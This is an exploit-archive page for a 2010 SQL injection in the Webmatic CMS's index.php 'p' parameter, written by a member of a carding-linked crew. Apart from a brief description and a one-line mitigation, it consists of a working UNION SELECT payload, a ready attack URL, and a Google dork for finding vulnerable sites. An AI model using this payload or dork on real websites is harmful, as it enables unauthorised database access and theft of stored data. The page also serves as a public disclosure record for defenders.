header-logo
Suggest Exploit
vendor:
Webmatic
by:
v3n0m
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Webmatic
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Webmatic (index.php) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent via the 'p' parameter in the 'index.php' script. The query will be executed in the context of the application and can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
            Webmatic (index.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: November, 13-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Webmatic
Vendor  	: http://www.webmatic.it/it/
Google Dork	: "Powered by Webmatic" inurl:index.php?lng=it&p=


Exploit
_______
 
-9999+union+all+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18--

http://site/[path]/index.php?lng=it&p=-9999+union+all+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18--


ShoutZ
______
All YOGYACARDERLINK CREW, GheMaX, LeQhi
Also Jovita & Fabian :)